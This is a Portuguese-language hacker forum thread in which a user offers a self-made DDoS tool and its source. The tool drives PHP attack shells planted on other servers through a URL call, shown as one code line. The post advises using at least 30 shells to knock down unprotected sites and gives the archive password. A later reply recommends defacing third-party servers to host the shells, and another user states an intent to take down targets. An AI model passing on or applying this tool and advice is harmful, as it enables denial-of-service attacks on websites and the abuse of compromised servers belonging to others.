Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Agares DDoS Tool | Programa + Source || Developed by Agares

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Tools Agares DDoS Tool | Programa + Source || Developed by Agares


    Olá Galerinha do Guia do hacker hoje eu desenvolvi uma Ferrementa para a galera do Guia do hacker, muito boa para Attack DDoS e o melhor de tudo ainda vou liberar a Source para você estudar e apreender, mas logicamente eu sei que você não vai fazer isso então dê pelo menos o credito né hehe.


    Então vamos lá... Como funciona esse Programa ? bem, ele faz uma autenticação por shell pelo webbronser exemplo:
    Código:
    WebBrowser1.Navigate("sua shell ?act=phptools&host=" + textbox1.text + "&time=" + textbox2.Text) '
    isso é nada mais nada menos que o programa vai navegar na shell ^^ é muito simples mas é muito bom
    sei que nunca passou pela sua Cabeça "criar uma ferramenta DDoS seria muito fácil rs' "

    então como você viu no code acima você precisa de Shells UDP ou TCP ou HTTP ou Slorroris pro Attack funcionar.

    Pergunta: Quantas Shells eu preciso para fazer um bom attack ?
    no Minimo umas 30 Shells Batendo Duro. com isso voce derruba um Site Easy e qual quer Servidor desprotegido!

    Requerimento:
    - Ter instalado em seu Computador o Visual Basic 2010 ou Visual Studio ou qual quer versão superior!
    - Ter pelo menos algumas Shells UDP
    - Ter Inteligencia na hora de alterar a Shell ( obs: na sintax ("SUA SHELL AKI.php?act=.....)

    para quem não sabe o que é uma shell udp => Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    Source do Agares.php => Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...





    Bom... não seja mal educado ! dê obrigado e comente pois isso é privado devia ta na area VIP mas em fim tanto faz. se for postar minha source em outros forums dê meus creditos

    ta ai Luiz9 seu sonho de consumo hehe

    Link para Download:
    Source:Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    Release:Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    Scan:Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    Senha para Descompactar: agaresthegod

    Enjoy~

    O Único modo de Evitar Erros é Adquirindo Experiência. No Entando a única Maneira de Adquirir Experiência é cometendo Erros.
    Napoleão Bonaparti
    sigpic




    Skype: JoasRock
    Similar Threads

  • Font Size
    #2
    Mega post broder.
    Valeu.

    Continua assim que eu me apaixono.
    Não Acha Estranha Essa Frase:
    Eu Sou Hacker e Uso Windows XP!

    Use Débian, Aprenda Slackware e Brinque Muito Com Back|Track


    Fã ->Nickguitar.dll


    Quer ajudar nossso fórum e não sabe como?
    Então click na imagem e ajude-nos com os links off

    Comment


    • Font Size
      #3
      Postado Originalmente por Lord Beni-Aretz Ver Post
      Mega post broder.
      Valeu.

      Continua assim que eu me apaixono.
      Vlw bro, vou continuar assim , ainda tenho muitos tuto's legais para postar

      O Único modo de Evitar Erros é Adquirindo Experiência. No Entando a única Maneira de Adquirir Experiência é cometendo Erros.
      Napoleão Bonaparti
      sigpic




      Skype: JoasRock

      Comment


      • Font Size
        #4
        Muito obrigado ^^, vo tentar derrubar umas coisas aqui!

        Comment


        • Font Size
          #5
          Muito bom, parabéns

          Comment


          • Font Size
            #6
            post até legal vai ajudar os novatos (:
            sigpic

            Comment


            • Font Size
              #7
              Massa man, eu estava realmente por fora... Não sabia que era possível enviar packets desta forma com PHP :O Sua host não vai tretar com você não se consumir toda banda?

              Comment


              • Font Size
                #8
                Mandou bem....
                Baixando para testar



                vlw
                sigpic
                " O bom hacker todos conhecem e sabem quem é, mas o excelente hacker... esse nunca saberemos quem um dia foi."
                Nova lei - Invadir computadores protegidos é crime.
                Lógica - Se eu invadi, não é protegido. Logo, não é crime

                Comment


                • Font Size
                  #9
                  Sempre com ótimos posts.
                  Yes, I am a criminal. My crime is that of curiosity. My crime is
                  that of judging people by what they say and think, not what they look like.
                  My crime is that of outsmarting you, something that you will never forgive me
                  for.

                  I am a hacker, and this is my manifesto. You may stop this individual,
                  but you can't stop us all... after all, we're all alike.

                  Comment


                  • Font Size
                    #10
                    Postado Originalmente por H4ck3rus Ver Post
                    Massa man, eu estava realmente por fora... Não sabia que era possível enviar packets desta forma com PHP :O Sua host não vai tretar com você não se consumir toda banda?

                    Amigo a ideia é você fazer deface e hospedar em outros servidores ou em sites por que ai fica melhor e você não gasta nenhum $
                    ~


                    O Único modo de Evitar Erros é Adquirindo Experiência. No Entando a única Maneira de Adquirir Experiência é cometendo Erros.
                    Napoleão Bonaparti
                    sigpic




                    Skype: JoasRock

                    Comment


                    • Font Size
                      #11
                      Simplesmente Lindo!!!

                      []'s

                      Comment


                      • Font Size
                        #12
                        nuss

                        muito bom manow! ta de parabens ferramneta toop
                        É meu fã? Use minha fan bar

                        Comment


                        • Font Size
                          #13
                          ;D



                          Pena que Ataque por Shells não é muito bom cai muito devido a cosumação em massa da banda do site... mas é melhor do que usar sua própria banda do seu Computador.


                          O Único modo de Evitar Erros é Adquirindo Experiência. No Entando a única Maneira de Adquirir Experiência é cometendo Erros.
                          Napoleão Bonaparti
                          sigpic




                          Skype: JoasRock

                          Comment


                          • Font Size
                            #14
                            tesaum sua assinatura agares

                            Comment


                            • Font Size
                              #15
                              ??

                              Nao sei pq , mas quando a solution da source abre ,fala que tem 1 ou mais arquivos faltando ._.

                              Vou ver se resolvo aqui , muito vlw :/

                              Comment

                              X
                              Working...
                              X